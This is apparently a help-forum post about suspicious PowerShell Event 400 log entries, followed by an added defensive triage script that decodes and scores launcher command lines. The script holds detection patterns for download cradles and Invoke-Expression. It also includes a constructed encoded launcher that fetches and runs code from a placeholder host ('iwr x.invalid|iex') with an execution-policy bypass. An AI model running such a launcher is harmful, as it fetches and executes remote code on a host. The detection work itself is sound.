We seem to be getting a lot of strange traffic on our network lately, and I've been digging through some logs and am wondering if our systems have been compromised and it is going undetected, or if someone is exploiting PowerShell and using it to run various scripts/commands and whatnot.
This is all over my head, though, so can anyone give me some direction with some of these scripts that are showing up in Event Viewer and let me know whether these are organic processes or not? I'm suspecting they aren't, and I'm basing that only on the fact that all these scripts are operating under "-NoProfile"... But I honestly have no idea. All I know is that there is a lot of strange network activity and connections, and I have also been getting non-stop DDoS attacks.
Script:
Engine state is changed from None to Available.
Details:
NewEngineState=Available
PreviousEngineState=None
SequenceNumber=13
HostName=ConsoleHost
HostVersion=5.1.18362.1171
HostId=95e18379-62d1-4071-8527-d6670d0a13be
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command & { $isOfficeInstalled = Get-AppxPackage Microsoft.Office.Desktop -allusers; if ($isOfficeInstalled -eq $null) { Out-File -FilePath 'Centennial.Detection.IsCentennialOfficeInstalled.scratch' -InputObject '0' -Encoding ascii; } else { Out-File -FilePath 'Centennial.Detection.IsCentennialOfficeInstalled.scratch' -InputObject '1' -Encoding ascii } }
EngineVersion=5.1.18362.1171
RunspaceId=1683da92-effe-4dfd-9404-ef09f9a73308
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
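The record above is a Windows PowerShell engine-lifecycle event (Event ID 400 in the "Windows PowerShell" log); the only part of it that says anything about what was run is the HostApplication field, which is the command line of the process that started the engine. Switches like -NoProfile, -NonInteractive and -WindowStyle Hidden are the standard way installers and scheduled tasks launch PowerShell, so on their own they do not separate routine automation from an attacker's launcher; what does are things like an -EncodedCommand payload, a download cradle (Net.WebClient, Invoke-WebRequest) piped into Invoke-Expression, or an execution-policy bypass. The script below is an added example, not part of the original post: it pulls HostApplication out of Event 400 messages, decodes any -EncodedCommand payload, and scores both against a small indicator list. The indicator names, weights and the "REVIEW" threshold are my own assumptions, not a vendor ruleset; the first sample is the event quoted in the post, the second is a constructed message in the same shape (its base64 decodes to "iwr x.invalid|iex", with x.invalid as a placeholder host).

```powershell
# Added example (not from the original post): triage Windows PowerShell engine-start
# events (Event ID 400, "Windows PowerShell" log) by the HostApplication field.
# Indicator names, weights and the REVIEW threshold are assumptions, not a vendor ruleset.

# Each Event 400 message carries a "Details:" block of Key=Value lines; HostApplication
# holds the full command line of the process that started the engine.
function Get-HostApplicationFromMessage {
    param([Parameter(Mandatory)][string]$Message)
    $m = [regex]::Match($Message, '(?ms)^\s*HostApplication=(.*?)(?=^\s*EngineVersion=|\z)')
    if (-not $m.Success) { return $null }
    return ($m.Groups[1].Value -replace '\s+', ' ').Trim()
}

# Indicators commonly seen in malicious launchers. -NoProfile and -WindowStyle Hidden are
# routine for installers and scheduled tasks, so they carry little or no weight by themselves.
$Indicators = @(
    @{ Name = 'EncodedCommand';    Pattern = '-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}';                                Weight = 5 }
    @{ Name = 'Download cradle';   Pattern = 'DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|\bcurl\b'; Weight = 4 }
    @{ Name = 'Invoke-Expression'; Pattern = 'Invoke-Expression|\biex\b';                                                     Weight = 4 }
    @{ Name = 'Base64 decode';     Pattern = 'FromBase64String';                                                              Weight = 3 }
    @{ Name = 'Policy bypass';     Pattern = '-ExecutionPolicy\s+Bypass|-ep\s+bypass';                                        Weight = 2 }
    @{ Name = 'Hidden window';     Pattern = '-WindowStyle\s+Hidden|-w\s+hidden';                                             Weight = 1 }
    @{ Name = 'NoProfile';         Pattern = '-NoProfile|-nop\b';                                                             Weight = 0 }
)

function Test-PsHostApplication {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$HostApplication)
    process {
        $text = $HostApplication
        # -EncodedCommand hides the real script: decode it (base64 of UTF-16LE) and score that too.
        $enc = [regex]::Match($HostApplication, '-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})', 'IgnoreCase')
        $decoded = $null
        if ($enc.Success) {
            try { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($enc.Groups[2].Value)) } catch { }
            if ($decoded) { $text += "`n" + $decoded }
        }
        $score = 0
        $names = @()
        foreach ($i in $Indicators) {
            if ($text -match $i.Pattern) { $score += $i.Weight; $names += $i.Name }   # -match is case-insensitive
        }
        $verdict = if ($score -ge 4) { 'REVIEW' } else { 'likely routine' }
        [pscustomobject]@{
            Score      = $score
            Verdict    = $verdict
            Indicators = $names -join ', '
            Decoded    = $decoded
            Command    = $HostApplication
        }
    }
}

# Sample 1: the Event 400 message quoted in the post above (HostApplication joined to one line).
$fromPost = @'
Engine state is changed from None to Available.
Details:
NewEngineState=Available
PreviousEngineState=None
SequenceNumber=13
HostName=ConsoleHost
HostVersion=5.1.18362.1171
HostId=95e18379-62d1-4071-8527-d6670d0a13be
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command & { $isOfficeInstalled = Get-AppxPackage Microsoft.Office.Desktop -allusers; if ($isOfficeInstalled -eq $null) { Out-File -FilePath 'Centennial.Detection.IsCentennialOfficeInstalled.scratch' -InputObject '0' -Encoding ascii; } else { Out-File -FilePath 'Centennial.Detection.IsCentennialOfficeInstalled.scratch' -InputObject '1' -Encoding ascii } }
EngineVersion=5.1.18362.1171
RunspaceId=1683da92-effe-4dfd-9404-ef09f9a73308
'@

# Sample 2: a constructed message in the same shape with an encoded launcher
# (the base64 decodes to "iwr x.invalid|iex"; x.invalid is a placeholder, not a real host).
$constructed = @'
Engine state is changed from None to Available.
Details:
NewEngineState=Available
HostName=ConsoleHost
HostApplication=powershell.exe -nop -w hidden -ep bypass -enc aQB3AHIAIAB4AC4AaQBuAHYAYQBsAGkAZAB8AGkAZQB4AA==
EngineVersion=5.1.18362.1171
'@

# Sample 1 scores 1 (Hidden window) -> "likely routine"; sample 2 scores 16 -> "REVIEW".
$fromPost, $constructed |
    ForEach-Object { Get-HostApplicationFromMessage $_ } |
    Test-PsHostApplication |
    Format-List Score, Verdict, Indicators, Decoded, Command

# Against the live log on the host (needs rights to read the event log):
# Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400 } |
#     ForEach-Object { Get-HostApplicationFromMessage $_.Message } |
#     Test-PsHostApplication | Where-Object Verdict -eq 'REVIEW'
```

Event 400 only records the launcher command line, so a script started from a file (-File something.ps1) shows up as nothing more than a path. To see the contents of what actually ran, turn on PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log); that is the log to search when a HostApplication looks odd.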